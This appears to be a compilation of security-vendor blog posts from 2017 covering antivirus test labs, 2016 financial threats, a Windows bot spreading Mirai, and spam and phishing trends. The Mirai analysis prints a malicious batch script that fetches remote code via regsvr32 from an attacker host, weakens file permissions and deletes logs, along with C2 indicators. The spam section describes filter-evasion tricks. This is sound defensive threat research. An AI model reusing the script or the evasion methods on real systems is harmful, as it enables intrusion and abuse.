There are numerous companies on the anti-malware testing market. This is undoubtedly beneficial for the industry, as each of them carries out tests on their own collections, and assessments from different laboratories make it possible to evaluate the overall quality of a security solution. However, it should be noted that not all test companies use sufficiently developed methodologies. Below are the best known test laboratories.

AV Comparatives. This Austrian company is one of the oldest on the anti-malware testing market. It specializes in security solutions for B2B and performs a range of tests including RW tests on its own closed collection. The tests are held every month over a period of 10 months, and the best vendors are awarded the Product of the Year or the Top Rated title. Once a year its analysts test solutions for Android and Mac OS, but only using the ODS methodology.

AV Test. A German company founded more than 10 years ago and currently the biggest player on the market. It conducts monthly comparative RW tests, the results of which are provided every two months; it also uses the ODS + ODS + OES methodology (i.e., the sample is scanned, run and scanned again). It conducts performance tests. The company also tests Android and twice a year tests Mac OS using the ODS method.

MRG. Based in the UK, the company has been testing since 2009. It specializes in in-depth technology tests and carries out quarterly comparative RW tests (360 Assessment). MRG also tests financial threats (online banking test) and occasionally performs exploit prevention tests. It also carries out various on-demand tests.

SELabs was founded by former DTL employee Simon Edwards. It has replaced DTL on the market and uses the same set of tests. It conducts quarterly RW tests, including exploit-prevention tests, using its own attacks devised on the basis of frameworks.

Virus Bulletin. It conducts very simple test certification based on ODS methods using the static Wildlist collection, available for download by vendors. It also carries out behavioral tests of anti-malware solutions whose databases have not been updated for several months.

ISCA. This US company is a division of Verizon. It only performs certification tests and additionally tests Anti-APT class solutions.

NSS Labs. Yet another US company focused on the corporate segment. Its results are not published, but instead provided on a paid subscription. The company’s arsenal includes RW tests, exploit prevention tests and protection against APTs.

Magazines and online publications such as PC Magazine, ComputerBild, Tom’s Hardware Guide, etc., also carry out their own antivirus tests. However, their approach is not very transparent: they don’t make their malware sample collections public and don’t provide feedback to the vendor.

In addition to the aforementioned market players, there are plenty of local players conducting irregular or specific tests at the request of vendors. Care should be taken when evaluating their results because their methodology is often not transparent, and the selection of comparative testing participants is far from complete. It should be noted that a high-quality methodology is not invented overnight; it is a complex and expensive process that takes years of work, requiring significant resources and expertise. Only such tests provide an objective picture of the security product market.

How to win tests

To come out top in testing, it’s not enough to simply introduce new technologies; coming first in a test is always the result of arduously and continuously correcting errors. The more high-quality tests a product participates in, the more accurate the information developers get about where to look for challenges and shortcomings.

Winning in a simple test carried out by a company that doesn’t have a well-developed methodology can be useful for marketing: you can place a label on the product box and issue a press release, but experts know that it’s necessary to look at the results of the flagship tests. The most important thing about them is a clear, fully developed methodology that corresponds to the modern threat landscape.

Even first place in a test where product performance and false positives are not tested, doesn’t reveal anything about a product’s ability to cope with modern threats without having a negative impact on the user. It’s easy to achieve 100% protection, but much harder to do so without interfering with the user’s work. And if a vendor doesn’t participate in the more advanced tests, it’s a clear sign that they have some serious problems with product performance.

Financial cyberthreats in 2016

Malware Alerts - Wed, 02/22/2017 - 03:55

In 2016 we continued our in-depth research into the financial cyberthreat landscape. We’ve noticed over the last few years that large financial cybercriminal groups have started to concentrate their efforts on targeting large organizations – such as banks, payment processing systems, retailers, hotels and other businesses where POS terminals are widely used.

For example, the financial cybercrime group Carbanak and its followers, the so-called SWIFT hackers, have been able to steal millions of dollars from its roster of victims, which has included banks and other financial institutions. The benefits of this type of cybercrime are clear – going after the big fish means criminals can reap greater rewards. Even when the costs of preparing for, and executing, attacks against large organizations like this, are high.

Despite this trend, regular users and smaller and medium businesses cannot rest on their laurels. The number of attacked users of this calibre started to grow again in 2016, following a decline in 2014 and 2015. Our report provides an overview of the types of attack users are up against as the financial cyberthreat landscape continues to evolve.

Financial phishing attacks

Financial phishing is one of the most widespread types of cybercriminal activity and in 2016 we saw it become even more prevalent, increasing both in volume and in professionalism.

For the first time in 2016, the detection of phishing pages which mimicked legitimate banking services took first place in the overall chart – as criminals sought to trick their victims into believing they were looking at genuine banking content or entering their details into real banking systems.

  • In 2016 the share of financial phishing increased 13.14 percentage points to 47.48% of all phishing heuristic detections. This result is an all-time high according to Kaspersky Lab statistics for financial phishing caught on Windows-based machines.
  • Every fourth attempt to load a phishing page blocked by Kaspersky Lab products was related to banking phishing.

The percentage of financial phishing detected by Kaspersky Lab in 2014-2016

Banking malware:

In 2016 the number of users attacked with malware targeting financial data started increasing once more, following a decrease in 2014 and 2015.

  • In 2016 the number of users attacked with banking Trojans increased by 30.55% to reach 1,088,900.
  • 17.17% of users attacked with banking malware were corporate users.
  • Users in Russia, Germany, Japan, India, Vietnam and the US are the ones most often attacked by banking malware.
  • Zbot remained the most widespread banking malware family (44.08% of attacked users) but in 2016 it was actively challenged by the Gozi family (17.22%).

The trends show us that although professional cybercriminal groups have indeed shifted a lot of their attention to targeted attacks against large companies, regular users and smaller firms are still being targeted with the help of widespread malware including Zbot, Gozi, Nymaim, Shiotob, ZAccess, Tinba, Shiz and more.

The dynamic change in the number of users attacked with banking malware 2015-2016

Android banking malware:

Android banking Trojans deserve a mention in our financial cyberthreat report due to some particularly interesting activity. From mid-2016 we discovered that the number of attacked Android users was increasing at an exponential rate, from just 3,967 attacked users in January to around 75,000 in October 2016.

  • In 2016 the number of users that encountered Android malware increased 430% to reach 305,000 worldwide.
  • Russia, Australia and Ukraine are the countries with the highest percentage of users attacked by Android banking malware.

Interestingly we discovered that just two families of malware were responsible for this sudden change: Asacub and Svpeng, which affected a large number of users, most of whom were in Russia. While Asacub was distributed actively via SMS, Svpeng was spread through Google AdSense and took advantage of a security issue in a popular mobile browser.

The change in the number of users attacked with Android banking malware 2015-2016

It’s clear that financial cybercriminals are increasingly on the look-out for new ways to exploit users and extract money from them. Owners of Android-based devices should be extremely cautious when surfing the web – especially if they have financial applications installed.

But caution is advised for everyone. As predators become more persistent and as their methods grow more convincing, corporate users and home users alike – whatever type of device they use – need to be aware of the dangers and understand how to protect themselves from this ever-evolving cyberthreat landscape.

Fill out the form below to receive the full text of the Financial cyberthreats landscape in 2016 report.

MktoForms2.loadForm("//", "802-IJN-240", 10140);

New(ish) Mirai Spreader Poses New Risks

Malware Alerts - Tue, 02/21/2017 - 03:56

A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly. However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.

The earliest we observed this spreader variant pushing Mirai downloaders was January 2016. This Windows bot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t have a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a new threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they can be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center software, and other internal devices.

So, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very limited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web resources and servers. These servers help provide a better timeline of operation for the operator. One of the directly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And most of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest code or most impressive leap.

Regardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows platform. Much like the Zeus banking trojan source code release that brought years of problems for the online community, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure for years to come, and this is just a minor start.

Notably, the 2016 Mirai operations were unique for two reasons:

  • newly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers) on a large scale
  • record setting DDoS traffic generation, exceeding all previous volumes

The great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation states’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of nation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the Internet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down wide swaths of the internet using this juvenile toolset? It’s very possible.

In response to the huge problem this poses to the internet infrastructure, over the past few months, our team and CERT have participated in multiple successful command and control takedown efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these takedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And, we are happy to partner with more network operators to leverage our connections with CERTs, LE, and other partners around the world to further enable this success.

The Windows Spreader – Who What Where

This Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading techniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot executables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and checks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot. These devices include

  • IP-based cameras
  • DVR
  • Media center appliances
  • Various Raspberry and Banana Pi

Unfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from string artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in Taiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it is likely that this developer/operator is Chinese speaking.

The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and network for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source is publicly available.

Below is a proportional comparison of the second stage component’s IP geolocations (fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is served from one of two web hosts, both hosted in Taiwan :



When downloaded, it is copied to disk with one of several filenames and executed:

cab.exe, ms.exe, cftmon.exe

Clearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.


The bot code and various components have been pulled together from other projects and previous sources. At runtime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading additional configuration files, fetching further instruction, and downloading and running additional executable code. Again, mostly all of these components, techniques, and functionality are several years old and are very large file objects.

Windows Spreader Infection Process
i.e. c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
Changes DNS settings to,
downloads and executes
from hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)
hxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)


hxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg (b27590a4b89d31dc0210c3158b82c175) to c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)

and runs with command line parameters “-create” “-run”

Downloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)

This file is a command shell script that registers a variety of files, including database connectivity libraries, and cleans up unneeded traces of itself on the system.

http://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)

It copies itself to the tasks directory, and installs itself as a scheduled job.
c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping -n 6 && del c:\windows\system\msinfo.exe >> NUL
c:\program files\kugou2010\ms.exe (10164584800228de0003a37be3a61c4d)

Keylogger (hosted as comments within jpeg files)

This botnet operator hosts components embedded within jpeg comments, a technique they have been using since 2013. These techniques provide very large file objects. So, even a fresh image downloaded by this bot of Taylor Swift contains 2.3mb of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):

Modular bot code

Also interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (sql injection) and brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various attacks. The bots are instructed on individual tasks per an encrypted file downloaded from the available c2.


The Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken out across source libraries:


Code signing certificates

The code signing certificates appear to be stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China, and an expired one.

Kaspersky Lab products detect and prevent infections from these bots.

File object scan verdicts

DangerousPattern.Multi.Generic (UDS)

Behavioral verdicts


Appendix c2 and url



Xi’ an JingTech electronic Technology Co.,LTD
‎sn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36
Partner Tech(Shanghai)Co.,Ltd
sn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89



Contents of http://down.mykings[.]pw:8888/my1.html

@echo off
mode con: cols=13 lines=1
if exist C:\downs\runs.exe start C:\downs\runs.exe
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
start regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v shell /f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
del %0

Contents of http://up.mykings[.]pw:8888/update.txt

http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\windows\system\msinfo.exe

http://down.mykings[.]pw:8888/my1.html c:\windows\system\my1.bat

Relevant Links

Spam and phishing in 2016

Malware Alerts - Mon, 02/20/2017 - 05:57

The year in figures

According to Kaspersky Lab, in 2016:

  • The proportion of spam in email flows was 58.31%, which is 3.03 percentage points more than in 2015.
  • 62.16% of spam emails were no more than 2 KB in size.
  • 12.08% of spam was sent from the US.
  • Trojan.Win32.Bayrob was the most popular malware family distributed via email.
  • Germany (14.13%) was the country where email antivirus was triggered most often.
  • There were 154,957,897 instances of the Anti-Phishing system being triggered.
  • A total of 15.29% unique users were attacked by phishers.
  • Brazil suffered the highest number of phishing attacks, with 27.61% of the global total.
  • 47.48% of incidents triggering the heuristic component in the Anti-Phishing system targeted clients of various financial organizations.
World events in spam

In 2016, fraudulent spam exploited the theme of major sporting events: the European Football Championship, the Olympic Games in Brazil, as well as the upcoming World Cups in 2018 and 2022. Typically, spammers send out fake notifications of lottery wins linked to one of these events. The content of the fake messages wasn’t exactly very original: the lottery was supposedly held by an official organization and the recipient’s address was randomly selected from millions of other addresses. To get their prize, the recipient had to reply to the email and provide some personal information.

With these sport-themed emails more details were often included in DOC, PDF or JPEG attachments that also contained graphic elements such as official emblems, event and sponsor logos. Messages that displayed the spam text directly in the body of the email were not very numerous. To add a bit of variety to their messages, spammers resorted to an old trick: they changed the text, the email addresses used for feedback, sender addresses, the attachment names, the size, etc. At the same, emails with the same attachment could be found in our traps on numerous occasions over a period of several months.

In the fourth quarter of 2016, spammers turned their attention to the future World Cup tournaments scheduled for 2018 and 2022. Spam traffic often included fraudulent notifications of lottery wins exploiting this theme.

The football theme was also used in malicious spam. In particular, cybercriminals sent out fake notifications with scans taken from a website that publishes news about computer games and the world of football, apparently in an attempt to arouse interest among recipients. The attached ZIP archive included a JavaScript downloader detected by Kaspersky Lab as Trojan-Downloader.Script.Generic. This malware, in turn, downloaded other malicious software to the victim’s computer.

The subject of terrorism, which has remained an important global issue in recent years, was also exploited in spam mailings. Numerous so-called Nigerian letters were sent to users on behalf of both state organization employees and individuals. The details of the stories may have differed, but the senders’ intention was the same – to get the recipient’s attention with promises of large sums of money and make them join in a conversation. Nigerian letters exploiting the tense situation in Syria remained popular in 2016 and were actively used to trick users.

Malicious spam exploiting the theme of terrorism was less common. It was used to steal personal information, organize DDoS attacks and install additional malware on victims’ computers.

Email offers from Chinese factories

In the email traffic for 2016, we often came across messages from Chinese factories and plants advertising their products. These spammers offered both finished products as well as spare parts for a variety of different spheres.

The text of a typical spam message began with an impersonal greeting to the recipient, followed by the name and surname of the factory manager. Often, the email described the merits of the company, its achievements and types of certification. The products offered by the company were either listed in the email or sent at the request of the recipient. For greater clarity, some of the emails also contained pictures of the goods on offer. At the end of the message, there were contact details (phone, mobile phone and fax numbers, email address, various messengers). Sometimes the contact details were specified in the image attached to the email.

The authors of the emails were representatives of the manufacturers, but the sender addresses were registered with both free email services and the companies’ domain names. Sometimes the messages included a company website, if the company had one.

In many countries, there was a time when small and medium-sized businesses preferred to use spam to promote their products. But users began to view this kind of advertising as undesirable, anti-spam laws were introduced, and, most importantly, new, more targeted, convenient and less intrusive advertising platforms appeared, with social networking sites prominent among them. We can only presume why Chinese businesses have not followed this trend (given that China has passed its own anti-spam law, which is one of the strictest in the world). The fact is that social networks in China are mainly internal, with global giants such as Facebook not permitted. As a result, Chinese entrepreneurs have far fewer legal means of entering the international market.

A year of ransomware in spam

In 2016, we recorded a huge amount of malicious spam. In previous years, Fraud.gen was the program most often used in malicious attachments. It appears in the form of an HTML page and is designed to steal the victim’s credit card data. In 2016, the absolute leaders in spam were Trojan downloaders that download ransomware to the victim’s computer. The most popular were mass spam mailings sent out to infect user computers with the Locky encryptor. However, other ransomware such as Petya, Cryakl and Shade were also widespread.

The number of malicious programs began to increase in December 2015 and continued to grow in waves throughout the year. The sharp falls were mainly caused by the fact that cybercriminals temporarily disabled the Necurs botnet, responsible for the majority of spam spreading Locky. Once the botnet was up and running again, the cybercriminals changed the spam templates.

Quantity of malicious emails in spam, 2016

In 2016, the Anti-Phishing system was triggered 239,979,660 times on the computers of Kaspersky Lab users, which is four times more than the previous year.

Such extensive use of ransomware may be due to the availability of this sort of malware on the black market. Currently, cybercriminals can not only rent a botnet to send out spam but also connect to so-called Ransomware-as-a-Service. This means that the attacker may not be a hacker in the traditional sense, and may not even know how to code.

Malicious spam messages often imitated personal correspondence, prompting recipients to view attached documents under various pretexts. Cybercriminals also sent out fake bills, or receipt notifications or even messages from office equipment with scanned documents allegedly attached.

Both examples above contain an attachment in the form of a malicious file with a .wsf extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Agent.myd. The malicious file is written in JavaScript and downloads a Locky encryptor modification to the victim’s machine.

This screenshot shows an attachment containing a malicious file with a .jse extension, detected by Kaspersky Lab as Trojan-Downloader.JS.Cryptoload.auk. This is yet another malicious file written in JavaScript that downloads a Locky encryptor modification to the victim’s machine.

Overall, a wide variety of malicious attachments were used. As a rule, these were archives containing programs written in Java and JavaScript (JS files, JAR, WSF, WRN, and others), but there were also office documents with macros (DOC, DOCX, XLS, RTF) as well as classic executable files (EXE). Sometimes rare archive formats such as CAB were used.

When launched, ransomware programs encrypt the data on a user’s computer and demand a ransom (usually in bitcoins via the Tor network). More details about these programs can be found in our report Kaspersky Security Bulletin 2016. The ransomware revolution.

Spammer tricks Adding ‘noise’ to text

To make each email unique, spammers insert random sequences of characters in their messages that are invisible to the user. This trick is not new, but spammers continue to use it, perfecting their methods. Below we describe the most popular tricks of 2016 used by spammers to add ‘noise’. All the examples below are taken from real-life spam messages.

  1. Small letters and/or white text.

    The easiest and oldest trick: the text can be written in white font (ffffff – 16 hexadecimal code written in white).

    In this example, the random sequence of letters written in very small print and in white are arranged between words of a standard size in the sentence “You have received a £500”.

  2. Text that is not displayed.

    With the help of the attribute style = “display: none;” text in an email is simply not displayed. In standard situations, this tag is used in rough drafts, for example. When it comes to spam, these tags, containing random text, are inserted in messages in large quantities and if the anti-spam filter is not set up to process such tags, the text of an email practically disappears.

    The same effect can be achieved by inserting a random sequence written in zero font:

  3. Placing text outside the screen range.

    Yet another way to make junk text invisible to the user is to write it in standard font, but insert it in parts of the email that are beyond the screen frame (to the extreme left or right, or below the main part):

  4. Using tags that by default are not visible to users.

    Sometimes random text is inserted in tags that are not designed to display text to the user. Typically, comment tags are used, though there are other examples:

    The content of the <noscript> tag is only displayed on computers with unsupported or disabled scripts, so most users will not see it.

  5. Using tags to add noise

    Rather than using random sequences of characters that are made invisible, sometimes text is obfuscated with tags that have no value and cannot be interpreted:

    The number of these sorts of tags in some spam emails can be in the hundreds.

    Sometimes a very random sequence is inserted inside a tag as its attribute, rather than between specific tags:

    This attribute will, of course, not be interpreted either and will not be displayed in the email that the user sees.

Masking links

There may be numerous ways of altering text in an email, but when it comes to URLs in spam messages, the situation is different. There can be lots of URLs in a single mass mailing (even reaching into the thousands), but they are subject to more limitations, as spammers have to pay for the purchase of each domain. However, attackers have come up with different techniques to make each link unique while also ensuring it opens correctly when clicked.

  1. Obfuscation of domains using the UTF range:

    In last year’s report we described some spammer tricks that involved different ways of expressing domain names and IP addresses. The trend for writing domain names using symbols from different UTF ranges and using different numerical systems for IP addresses continued in 2016.

    Especially popular with spammers were mathematical alphanumeric symbols. For example:

    Domain written using mathematical bold script.

    Domain written using mathematical monospace small.

    The range is designed for specific mathematical formulas and must not be used in plain text or hyperlinks.

  2. Mixing encodings

    The above trick was diversified by mixing encodings: spammers use the Latin alphabet in Unicode to write some of the domain characters, while the rest are written using characters from special URL-encoded ranges.

    The domain from the example above is first changed to:

    and then to

  3. URL shortening services with added noise

    In addition to the various ways of writing the actual spammer site, from time to time cybercriminals use another trick to avoid mentioning the site directly in an email. This involves the use of URL shortening services and redirects. In 2016, spammers also resorted to a variety of other methods to add noise to each URL.

    They inserted characters, slashes and dots between the URL shortening service and the actual link identifier (the meaningful part is marked in bold; the rest is noise):

    Sometimes comment tags end up there:

    To deceive filters further, the names of different, usually well-known, sites are inserted in the noise part:

    All these parts will be dropped when the link is clicked.

    Yet another way to obfuscate a link is to add non-existent parameters to the end of the link:

    Everything that comes after the question mark in the link is not actually part of the URL – these characters are, in fact, parameters. The parameters can include a variety of information: for example, the unsubscribe link often contains the email address that needs to be entered in the unsubscribe form. However, URL shortening services, like many other sites, do not require or accept any parameters, so this part of the URL is simply dropped during the redirect process. Spammers take advantage of this and insert random sequences of parameters. In this particular case, the .pdf extension is added to the end of the parameters. This is not done to confuse the filters but rather the user, who is likely to think the link leads to a PDF file.

  4. Prefixes

    As well as parameters that can be added to the end of a link, noise elements can also be added to the beginning. These elements may include symbols that are ignored by the link interpreter when a redirect occurs, for example:

    (In this example, in addition to the noise at the beginning of the link and nonexistent parameters at the end, the link itself is an IP address written partially in octal and partially in hexadecimal encoding.)

    The most common technique for adding noise at the beginning of a link is to use the @ symbol. The @ symbol inserted before the domain can be utilized to identify the user in the domain (something that is no longer really applied these days). For sites that do not require identification, everything that comes before @ will simply be ignored by the browser.

    The symbol is useful for spammers because it allows them not only to add noise to the link but also to make it look more trustworthy to the user by specifying a well-known site before the @ symbol.

  5. Masked redirects

    Redirects have long been used by spammers to hide the main domain. We have already written about this in some detail. In 2016, the redirect methods used were not that diverse, but links with redirects were also obfuscated. The methods used were the same as those used with URL shortening services: the @ symbol, parameters and additional characters.

    Cybercriminals often used several techniques at once – concealing and obfuscating the original link:

    In the example below, the name of the site used to distract the user’s attention comes before the @ symbol, followed by the redirect to the URL shortening service (which is also just noise with several @ symbols), and it is only from this part that the user will get to the spammer’s site.

    Statistics Proportion of spam in email traffic

    In 2016, the proportion of spam in email traffic was 58.31%, which is 3.03 percentage points higher than the previous year.

    The proportion of spam in email traffic, 2016

    The lowest volume – 54.61% – was registered in February of 2016. After that, the proportion of spam grew steadily and reached a peak by the end of the year – 61.66% in November.

    Interestingly, the last time there was an annual increase in the proportion of spam in email traffic was eight years ago. Since then, the percentage of spam has fallen continuously from its peak of 85.2% in 2009, to 55.28% in 2015. We believe this was due to legitimate small and medium-sized businesses gradually phasing out their use of spam, turning instead to legal advertising platforms.

    The proportion of spam in global email traffic, 2009-2016

    This downward trend may now have come to a halt because all those who wanted to or could refrain from using spammer services have, for the most part, already done so. This slight growth is the result of a sharp increase in spam containing malicious attachments.

    Sources of spam by country

    Sources of spam by country, 2016

    In 2016, the top three sources of spam saw some changes: India climbed to third place with 10.15% due to a substantial growth in the volume of spam distributed (+7.19 p.p.). Such a dramatic increase may have been caused by botnets being organized in the region. Vietnam (10.32%) added 4.19 p.p. to its share and also moved up the rankings to second place. The US (12.08%) remained the clear leader despite a decrease of 3.08 p.p.

    China’s share (4.66%) fell by 1.46 p.p., though it remained in fourth. Following close behind were two Latin American countries – Mexico (4.40%) and Brazil (4.01%). Russia (3.53%), among the top three in 2015, ranked seventh in 2016 after seeing a 2.62 p.p. decrease in its share of distributed spam.

    France (3.39%, +0.22 p.p.) and Germany (3.21%, -1.03 p.p.) came eighth and ninth respectively. Turkey rounded off the Top 10 with a share of 2.29%, which is 0.34 p.p. more than in 2015.

    The size of spam emails

    The proportion of super-short spam emails (under 2 KB) dropped in 2016 and averaged 62.16%. This is 16.97 p.p. lower than in the previous year. The share of emails sized 2-5 KB also fell to 4.70%.

    The size of spam emails in 2016

    Meanwhile, the proportion of bigger emails increased considerably: 5-10 KB (6.15%), 10-20 KB (14.47%) and 20-50 KB (10.08%). It means that 2016 saw a trend towards fewer super-short spam emails and more emails of average size – from 5-50 KB. This was caused by a sharp increase in the proportion of spam with malicious attachments.

    Malicious attachments in email Malware families

    TOP 10 malware families, 2016

    In 2016, Trojan-Downloader.JS.Agent was the most widespread malware family. A typical representative of this malware family is an obfuscated Java script using ADODB.Stream technology to download and run DLL, EXE and PDF files.

    The Trojan-Downloader.VBS.Agent family occupied second place. They are VBS scripts utilizing ADODB.Stream technology to download ZIP archives and run software extracted from them.

    In third place was Trojan-Downloader.MSWord.Agent. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from a malicious site and runs it on the user’s computer.

    Trojan-Downloader.JS.Cryptoload in fourth is a malware family whose representatives are an obfuscated JavaScript that downloads and runs encryptors.

    Trojan.Win32.Bayrob rounded off the top five. The malicious programs from this Trojan family can download and run additional modules from the command server, as well as act as a proxy server. They are used to send out spam and steal personal data.

    The Trojan-PSW.Win32.Fareit family came sixth. These malicious programs are designed to steal data, such as the credentials of FTP clients installed on the infected computer, login details for cloud storage, cookie files in browsers, email passwords. Fareit Trojans send the collected information to a malicious server. Some members of the family are able to download and run other malware.

    The representatives of the Trojan-Downloader.JS.SLoad family in seventh are JS scripts that download and run other malware, mostly encryptors, on the victim computer.

    Eighth place was taken by the Trojan.Java.Agent family. The malicious programs of this family are written in Java and have the JAR extension. These applications exploit vulnerabilities in Sun Java Runtime and can delete, block, modify or copy data, as well as download and run other malware.

    Ninth place was occupied by Backdoor.Win32.Androm. This malware belongs to the family of Andromeda/Gamarue universal modular bots. Key features of these bots include the ability to download, store and run a malicious executable file, download and boot a malicious DLL (without saving it to disk), and update and delete itself. The bot functionality is extended with the help of plugins that can be uploaded by the intruders at any time.

    Completing the Top 10 is the Worm.Win32.WBVB family. It includes executable files written in Visual Basic 6 (both in P-code and Native mode) that are not trusted by KSN.

    Countries targeted by malicious mailshots

    Distribution of email antivirus verdicts by country, 2016

    In 2016, Germany (14.13%) remained in first place, despite a decrease of 4.93 p.p. Second and third were occupied by countries from the Asia-Pacific region – Japan (7.59%) and China (7.32%) – that were both outside the Top 10 in 2015.

    Russia (5.6%), which was third in the previous year’s rating, came fourth in 2016 after the proportion of email antivirus detections in the country decreased by 0.7 p.p. It was followed by Italy (5.44%), the UK (5.17%) and Brazil (4.99%), which also dropped out of the top three.

    The US came eighth, accounting for 4.03% of email antivirus detections, 0.89 p.p. less than the previous year.

    Austria (2.35%) rounded off the Top 10 with an increase of 0.93 p.p.


    In 2016, the Anti-Phishing system was triggered 154,957,897 times on the computers of Kaspersky Lab users. That is 6,562,451 more times than in 2015. Overall, 15.29% of our users were targeted by phishers.

    Hot topics of the year

    Phishers, predictably, could not pass up the most high-profile event of the year – the Olympic Games in Brazil. The scammers targeted both the organizers of the Olympic Games and ordinary netizens who received fake notifications of lottery wins, allegedly organized by the Brazilian government and the Olympic Committee.

    The US presidential elections were also seen as a good media event for phishers. This theme was exploited to mislead internet users not only in the US but also in other countries.

    Yet another interesting theme that became the subject of a dedicated study was holiday season sales. Scammers took advantage of the busy shopping period in the run-up to the festive season by creating fake websites of payment systems and online stores and luring potential victims by promising generous discounts.

    A fake online store page

    In addition, the holiday season itself often becomes an excellent cover for the fraudsters. For example, they may ask users to update their account information prior to the New Year.

    Phishing page exploiting the New Year theme in the subdomain name

    Methods of distributing phishing content

    In 2016, cybercriminals used all possible means to reach users and make them pass on confidential information or money: social networks, pop-up ads, banners, text messages.

    Among the most interesting methods were scams involving services for buying and selling used items. Cybercriminals collected phone numbers from ads placed on these services and then sent text messages to the numbers offering something in exchange at an extra cost. The message contained a link allegedly leading to a photo of the item on offer, but which actually led the victim to a phishing page.

    Fraudsters often exploit social networks, and it is not restricted to personal messages. In 2016, many Facebook users around the world, for instance, were prompted to install a malicious extension for their browser, when they were added to a post containing a phishing link that supposedly led to a provocative video.

    In Europe, the most widespread malicious extension was ‘xic. graphics’. It was soon removed from an online store, but according to the available whois information, over 50 other domains were registered in the name of the owners of the domain that hosted the fake page. Those domains were probably used for similar purposes.

    Phisher tricks: referrer cleaner services

    In Q4 2016, scammers showed a tendency to use referrer cleaner services. The victim was sent an email on behalf of a well-known company containing a link whose parameters included the address of the victim.

    After clicking the URL, the user is taken to a page that shows a 302 error and then redirects the user to the address of a referrer cleaner service, which in turn redirects them to the legitimate website of a bank.

